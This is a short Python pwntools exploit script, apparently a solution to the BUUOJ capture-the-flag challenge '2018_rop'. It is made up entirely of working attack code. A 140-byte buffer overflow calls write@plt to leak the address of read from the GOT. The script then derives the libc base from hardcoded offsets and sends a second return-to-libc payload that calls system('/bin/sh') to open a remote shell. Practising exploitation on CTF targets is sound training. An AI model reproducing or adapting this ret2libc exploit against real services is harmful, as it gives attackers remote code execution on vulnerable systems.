2018_rop

from pwn import *
from LibcSearcher import * 

r = remote("node5.buuoj.cn",29369) 
#r = process("2018_rop")
#libc = ELF("libc6_2.23-0ubuntu11.3_i386.so") 
elf = ELF("2018_rop")
#if args.G:
#	gdb.attach(r, "b *0x0804849b\r\n")
write_plt = elf.plt['write']
read_got = elf.got['read']
start_addr = elf.sym['main']

payload =  "a"*140+p32(write_plt)+p32(start_addr)+p32(0x1)+p32(read_got)+p32(0x4)
r.sendline(payload)
# recv read 
read_addr = u32(r.recv(4))
print("read_addr is:",hex(read_addr)) 
libc = LibcSearcher('read', read_addr)

# libcbase 
read_offset = 0x0e5620
sys_addr = 0x03cd10 
bin_addr = 0x17b8cf	
base_addr = read_addr-read_offset
system_addr = base_addr+sys_addr
binsh_str = base_addr+bin_addr

payload = "a"*140+p32(system_addr)+p32(1)+p32(binsh_str)
r.sendline(payload)
r.interactive()